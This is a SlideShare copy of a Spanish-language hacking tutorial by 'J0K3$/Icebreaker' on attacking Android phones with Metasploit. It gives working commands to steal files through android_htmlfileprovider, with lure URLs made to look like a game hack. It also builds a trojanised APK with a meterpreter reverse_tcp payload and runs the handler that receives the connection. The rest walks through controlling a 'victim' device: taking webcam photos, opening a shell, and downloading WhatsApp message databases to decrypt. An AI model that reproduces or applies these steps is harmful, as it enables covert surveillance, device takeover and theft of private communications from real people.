SlideShare una empresa de Scribd logo
1 de 9
Descargar para leer sin conexión
PENTEST & Support
Gathering en Android y Backdoor [Con Metasploit]
Por J0K3$/Icebreaker
Nivel de Paper = Básico
Gathering: Robo de Archivo en Android [Metasploit]
Hola!
En esta parte del paper explicaremos como conseguir información del Android,
primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno
una vez cargado usaremos el siguiente “Auxiliar” :
use auxiliary/gather/android_htmlfileprovider
Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno
ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso
os dejo acá una lista de los path de los directorios , para mi , interesantes.....
Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina
virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si
les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de
mi configuración y ahora les explicare punto por punto para que es cada.
Bueno, expliquemos esto por partes....
Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi
caso será hosts.
URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así
para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el
juego y saldria así : “Ip”/HackPou
SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la
dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les
extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al
ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo
HTTP]....
Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip ,
osease le daré esa ip haber que me muestra el exploit GO! .
Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android
+ modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con
una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no?
….¿Tienen miedo?
Backdoor en Android. Tomando el Control del dispositivo.
[Metasploit]
Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma
sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan
tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la
acción primero dentro de la consola de metasploit colocaremos esto ….
search android
Bueno verán los siguientes módulos.....
O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK
infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload ,
yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de
metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos
lo siguiente.....
sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o
Externa” R > “Ruta+Archivo.apk”
Ejemplo:
sudo msfpayload payload/android/meterpreter/reverse_tcp
LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk
Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué
pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a
msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin
formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden
comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien
escrito....Bueno una vez hecho eso, cargamos el exploit …...
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp
LHOST=”Su ip puesta en el backdoor” E
ejemplo:
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp
LHOST=”Su ip puesta en el backdoor” E
Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto....
O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para
ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”.....
Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una
foto con el teléfono infectado.....
No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y
como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos
shell....Esté es mi comando preferido....
O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard
haber que encontramos....
Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con
meterpreter hacia este directorio para descargarnos algo....
Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2
comandos...
pwd = Es para ver en que directorio empezamos inicialmente....
cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “]
entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las
conversaciones de whatsapp también podrían descargar imágenes...etc de todo ,
después de descargarlo usen algo como un whatsapp decripter y desencripten las
conversaciones para leerlas...ya are un paper de como se hacen ….
Saludos y que les allá servido de algo.
Gracias a Pentest And Support , especialmente gracias a David Urióstegui.

Más contenido relacionado

La actualidad más candente (12)

Práctica de calculadora documentada
Práctica de calculadora documentadaPráctica de calculadora documentada
Práctica de calculadora documentada
 
Primero quiero que entiendas algo
Primero quiero que entiendas algoPrimero quiero que entiendas algo
Primero quiero que entiendas algo
 
Uso de Excepciones en JAVA
Uso de Excepciones en JAVAUso de Excepciones en JAVA
Uso de Excepciones en JAVA
 
Manual de Lenguaje Batch
Manual de Lenguaje BatchManual de Lenguaje Batch
Manual de Lenguaje Batch
 
Destructores
Destructores Destructores
Destructores
 
Ataque kali
Ataque kaliAtaque kali
Ataque kali
 
Problemas con el_ordenador
Problemas con el_ordenadorProblemas con el_ordenador
Problemas con el_ordenador
 
Computer Problems Ra
Computer Problems RaComputer Problems Ra
Computer Problems Ra
 
Problemas Con El Ordenador
Problemas Con El OrdenadorProblemas Con El Ordenador
Problemas Con El Ordenador
 
Computer Problems Ra
Computer Problems RaComputer Problems Ra
Computer Problems Ra
 
PROBLEMAS CON EL PC
PROBLEMAS CON EL PCPROBLEMAS CON EL PC
PROBLEMAS CON EL PC
 
Problemas con el ordenador
Problemas con el ordenadorProblemas con el ordenador
Problemas con el ordenador
 

Destacado

SWong_Logo Usage Guide
SWong_Logo Usage GuideSWong_Logo Usage Guide
SWong_Logo Usage Guide
Sandra Wong
 
09 P2.Castletowns
09 P2.Castletowns09 P2.Castletowns
09 P2.Castletowns
mripmof
 
Энциклопедия домашней медицины
Энциклопедия домашней медициныЭнциклопедия домашней медицины
Энциклопедия домашней медицины
lehen
 
Gifted web quest
Gifted web questGifted web quest
Gifted web quest
RKG123123
 
學生品格的轉變
學生品格的轉變學生品格的轉變
學生品格的轉變
素妹 張
 
Letters of credit the way to win win
Letters of credit the way to win winLetters of credit the way to win win
Letters of credit the way to win win
Brian Ward
 

Destacado (20)

SWong_Logo Usage Guide
SWong_Logo Usage GuideSWong_Logo Usage Guide
SWong_Logo Usage Guide
 
09 P2.Castletowns
09 P2.Castletowns09 P2.Castletowns
09 P2.Castletowns
 
gestão participativa “Nenhum de nós é tão bom quanto todos nós juntos”
gestão participativa “Nenhum  de  nós  é  tão  bom  quanto  todos  nós  juntos”gestão participativa “Nenhum  de  nós  é  tão  bom  quanto  todos  nós  juntos”
gestão participativa “Nenhum de nós é tão bom quanto todos nós juntos”
 
Elearning2
Elearning2Elearning2
Elearning2
 
Európai mobilhasználati szokások - Norton Kiberbűnözési Jelentés 2012
Európai mobilhasználati szokások - Norton Kiberbűnözési Jelentés 2012Európai mobilhasználati szokások - Norton Kiberbűnözési Jelentés 2012
Európai mobilhasználati szokások - Norton Kiberbűnözési Jelentés 2012
 
Энциклопедия домашней медицины
Энциклопедия домашней медициныЭнциклопедия домашней медицины
Энциклопедия домашней медицины
 
презентація (шохирева)
презентація (шохирева)презентація (шохирева)
презентація (шохирева)
 
Gifted web quest
Gifted web questGifted web quest
Gifted web quest
 
Источник на краю света
Источник на краю светаИсточник на краю света
Источник на краю света
 
Arboles avl
Arboles avlArboles avl
Arboles avl
 
звіт
звітзвіт
звіт
 
學生品格的轉變
學生品格的轉變學生品格的轉變
學生品格的轉變
 
Letters of credit the way to win win
Letters of credit the way to win winLetters of credit the way to win win
Letters of credit the way to win win
 
Echo 91 decembre 2016 (1)
Echo 91 decembre 2016 (1)Echo 91 decembre 2016 (1)
Echo 91 decembre 2016 (1)
 
Case study of shukla villa, ahmedabad
Case study of shukla villa, ahmedabadCase study of shukla villa, ahmedabad
Case study of shukla villa, ahmedabad
 
A tabela detalhada da Copa do Nordeste 2017
A tabela detalhada da Copa do Nordeste 2017A tabela detalhada da Copa do Nordeste 2017
A tabela detalhada da Copa do Nordeste 2017
 
Python
PythonPython
Python
 
Elearning1
Elearning1Elearning1
Elearning1
 
Poradu
PoraduPoradu
Poradu
 
Agenda dies58
Agenda dies58Agenda dies58
Agenda dies58
 

Similar a Android

Ingeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiIngeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo ii
Freelance
 
Virtual box+tutorial -vagonetta-tk--.unlocked
Virtual box+tutorial -vagonetta-tk--.unlockedVirtual box+tutorial -vagonetta-tk--.unlocked
Virtual box+tutorial -vagonetta-tk--.unlocked
Pablo Villavicencio
 
Hack Crack Bindear
Hack  Crack BindearHack  Crack Bindear
Hack Crack Bindear
HxC Store
 
Que es action scrip 3
Que es  action scrip 3Que es  action scrip 3
Que es action scrip 3
Harolsmr1103
 

Similar a Android (20)

Introduccion a maratis con c++
Introduccion a maratis con c++Introduccion a maratis con c++
Introduccion a maratis con c++
 
Wifislax4.10.1
Wifislax4.10.1Wifislax4.10.1
Wifislax4.10.1
 
Tutorial
TutorialTutorial
Tutorial
 
Como desinfectar y proteger tu memoria usb de virus
Como desinfectar y proteger tu memoria usb de virusComo desinfectar y proteger tu memoria usb de virus
Como desinfectar y proteger tu memoria usb de virus
 
Tutorial Android 1
Tutorial Android 1Tutorial Android 1
Tutorial Android 1
 
Introduccion al hacking con SET.
Introduccion al hacking con SET.Introduccion al hacking con SET.
Introduccion al hacking con SET.
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Programación en Android 1 capítulo. Introducción
Programación en Android 1 capítulo. IntroducciónProgramación en Android 1 capítulo. Introducción
Programación en Android 1 capítulo. Introducción
 
Pocket Edition
 Pocket Edition  Pocket Edition
Pocket Edition
 
Ingeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiIngeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo ii
 
Solucion reto mr robot
Solucion reto mr robotSolucion reto mr robot
Solucion reto mr robot
 
Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018
 
Virtual box+tutorial -vagonetta-tk--.unlocked
Virtual box+tutorial -vagonetta-tk--.unlockedVirtual box+tutorial -vagonetta-tk--.unlocked
Virtual box+tutorial -vagonetta-tk--.unlocked
 
Wifislax tutorial
Wifislax tutorial Wifislax tutorial
Wifislax tutorial
 
Clase9 (consola linux)
Clase9 (consola linux)Clase9 (consola linux)
Clase9 (consola linux)
 
Hack Crack Bindear
Hack  Crack BindearHack  Crack Bindear
Hack Crack Bindear
 
Hack x crack_bindear
Hack x crack_bindearHack x crack_bindear
Hack x crack_bindear
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
 
Que es action scrip 3
Que es  action scrip 3Que es  action scrip 3
Que es action scrip 3
 
Dispositivos moviles
Dispositivos movilesDispositivos moviles
Dispositivos moviles
 

Último

5.1-La 1ª parte del reinado de Alfonso XIII y los proyectos de regeneracionis...
5.1-La 1ª parte del reinado de Alfonso XIII y los proyectos de regeneracionis...5.1-La 1ª parte del reinado de Alfonso XIII y los proyectos de regeneracionis...
5.1-La 1ª parte del reinado de Alfonso XIII y los proyectos de regeneracionis...
jose880240
 
MAPA CONCEPTUAL LA GLOBALIZACION xd.docx
MAPA CONCEPTUAL LA GLOBALIZACION xd.docxMAPA CONCEPTUAL LA GLOBALIZACION xd.docx
MAPA CONCEPTUAL LA GLOBALIZACION xd.docx
jespinozamu
 
Presentación Proyecto Creativo Moderno Azul.pptx
Presentación Proyecto Creativo Moderno Azul.pptxPresentación Proyecto Creativo Moderno Azul.pptx
Presentación Proyecto Creativo Moderno Azul.pptx
marlongeovx2008
 
Infografía de la materia economía macroeconomía
Infografía de la materia economía macroeconomíaInfografía de la materia economía macroeconomía
Infografía de la materia economía macroeconomía
antonio572117
 

Último (19)

OrtegaCarrillo_LuisManuel_M001S2AI6.pptx
OrtegaCarrillo_LuisManuel_M001S2AI6.pptxOrtegaCarrillo_LuisManuel_M001S2AI6.pptx
OrtegaCarrillo_LuisManuel_M001S2AI6.pptx
 
Modulo_1_Fundamentos_de_la_Criminalistica.pdf
Modulo_1_Fundamentos_de_la_Criminalistica.pdfModulo_1_Fundamentos_de_la_Criminalistica.pdf
Modulo_1_Fundamentos_de_la_Criminalistica.pdf
 
3.3 Conceptos previos sobre Lugar de Hecho.pdf
3.3 Conceptos previos sobre Lugar de Hecho.pdf3.3 Conceptos previos sobre Lugar de Hecho.pdf
3.3 Conceptos previos sobre Lugar de Hecho.pdf
 
La fotografia en accidentes de tránsito.
La fotografia en accidentes de tránsito.La fotografia en accidentes de tránsito.
La fotografia en accidentes de tránsito.
 
Documentacion de indicios balisticos.pdf
Documentacion de indicios balisticos.pdfDocumentacion de indicios balisticos.pdf
Documentacion de indicios balisticos.pdf
 
La fotografía en accidentes de tránsito.pdf
La fotografía en accidentes de tránsito.pdfLa fotografía en accidentes de tránsito.pdf
La fotografía en accidentes de tránsito.pdf
 
Byung Chul han historia de como abarcó la filosofía
Byung Chul han historia de como abarcó la filosofíaByung Chul han historia de como abarcó la filosofía
Byung Chul han historia de como abarcó la filosofía
 
5.1-La 1ª parte del reinado de Alfonso XIII y los proyectos de regeneracionis...
5.1-La 1ª parte del reinado de Alfonso XIII y los proyectos de regeneracionis...5.1-La 1ª parte del reinado de Alfonso XIII y los proyectos de regeneracionis...
5.1-La 1ª parte del reinado de Alfonso XIII y los proyectos de regeneracionis...
 
Vincent-Van-Gogh-y-el-poder-de-la-sinestesia-en-el-arte.pptx
Vincent-Van-Gogh-y-el-poder-de-la-sinestesia-en-el-arte.pptxVincent-Van-Gogh-y-el-poder-de-la-sinestesia-en-el-arte.pptx
Vincent-Van-Gogh-y-el-poder-de-la-sinestesia-en-el-arte.pptx
 
SESIÓN 02 - 1° - CONOCIENDO LA MITOLOGÍA ANDINA.docx
SESIÓN 02 - 1° - CONOCIENDO LA MITOLOGÍA ANDINA.docxSESIÓN 02 - 1° - CONOCIENDO LA MITOLOGÍA ANDINA.docx
SESIÓN 02 - 1° - CONOCIENDO LA MITOLOGÍA ANDINA.docx
 
TRIPTICO 2024 ANIVERSARIO................
TRIPTICO 2024 ANIVERSARIO................TRIPTICO 2024 ANIVERSARIO................
TRIPTICO 2024 ANIVERSARIO................
 
MAPA CONCEPTUAL LA GLOBALIZACION xd.docx
MAPA CONCEPTUAL LA GLOBALIZACION xd.docxMAPA CONCEPTUAL LA GLOBALIZACION xd.docx
MAPA CONCEPTUAL LA GLOBALIZACION xd.docx
 
Presentación Proyecto Creativo Moderno Azul.pptx
Presentación Proyecto Creativo Moderno Azul.pptxPresentación Proyecto Creativo Moderno Azul.pptx
Presentación Proyecto Creativo Moderno Azul.pptx
 
exposicion2024 dia 13 mayo Videoteca CRMNPCVT
exposicion2024 dia 13 mayo Videoteca CRMNPCVTexposicion2024 dia 13 mayo Videoteca CRMNPCVT
exposicion2024 dia 13 mayo Videoteca CRMNPCVT
 
428926353-Conclusiones-Descriptivas-Por-Areas-v-Ciclo.pdf
428926353-Conclusiones-Descriptivas-Por-Areas-v-Ciclo.pdf428926353-Conclusiones-Descriptivas-Por-Areas-v-Ciclo.pdf
428926353-Conclusiones-Descriptivas-Por-Areas-v-Ciclo.pdf
 
Curso de Fotografia digital. Unidad 1. 2024
Curso de Fotografia digital. Unidad 1. 2024Curso de Fotografia digital. Unidad 1. 2024
Curso de Fotografia digital. Unidad 1. 2024
 
3.7 Teoria General de la Fotografia de Manchas de Sangre.pdf
3.7 Teoria General de la Fotografia de Manchas de Sangre.pdf3.7 Teoria General de la Fotografia de Manchas de Sangre.pdf
3.7 Teoria General de la Fotografia de Manchas de Sangre.pdf
 
Infografía de la materia economía macroeconomía
Infografía de la materia economía macroeconomíaInfografía de la materia economía macroeconomía
Infografía de la materia economía macroeconomía
 
ENCUENTRO DE DIBUJOS - PROGRAMA RED LOCAL DE APOYOS Y CUIDADOS HUALQUI
ENCUENTRO DE DIBUJOS - PROGRAMA RED LOCAL DE APOYOS Y CUIDADOS HUALQUIENCUENTRO DE DIBUJOS - PROGRAMA RED LOCAL DE APOYOS Y CUIDADOS HUALQUI
ENCUENTRO DE DIBUJOS - PROGRAMA RED LOCAL DE APOYOS Y CUIDADOS HUALQUI
 

Android

  • 1. PENTEST & Support Gathering en Android y Backdoor [Con Metasploit] Por J0K3$/Icebreaker Nivel de Paper = Básico Gathering: Robo de Archivo en Android [Metasploit] Hola! En esta parte del paper explicaremos como conseguir información del Android, primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno una vez cargado usaremos el siguiente “Auxiliar” : use auxiliary/gather/android_htmlfileprovider Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso os dejo acá una lista de los path de los directorios , para mi , interesantes.....
  • 2. Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de mi configuración y ahora les explicare punto por punto para que es cada. Bueno, expliquemos esto por partes.... Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi caso será hosts. URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el juego y saldria así : “Ip”/HackPou SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo HTTP].... Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip , osease le daré esa ip haber que me muestra el exploit GO! .
  • 3. Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android + modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no? ….¿Tienen miedo? Backdoor en Android. Tomando el Control del dispositivo. [Metasploit] Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la acción primero dentro de la consola de metasploit colocaremos esto …. search android Bueno verán los siguientes módulos.....
  • 4. O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload , yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos lo siguiente..... sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o Externa” R > “Ruta+Archivo.apk” Ejemplo: sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien escrito....Bueno una vez hecho eso, cargamos el exploit …... sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E ejemplo: sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E
  • 5. Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
  • 6. Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”..... Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una foto con el teléfono infectado.....
  • 7. No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos shell....Esté es mi comando preferido.... O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard haber que encontramos....
  • 8. Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con meterpreter hacia este directorio para descargarnos algo.... Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2 comandos... pwd = Es para ver en que directorio empezamos inicialmente.... cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “] entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
  • 9. la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las conversaciones de whatsapp también podrían descargar imágenes...etc de todo , después de descargarlo usen algo como un whatsapp decripter y desencripten las conversaciones para leerlas...ya are un paper de como se hacen …. Saludos y que les allá servido de algo. Gracias a Pentest And Support , especialmente gracias a David Urióstegui.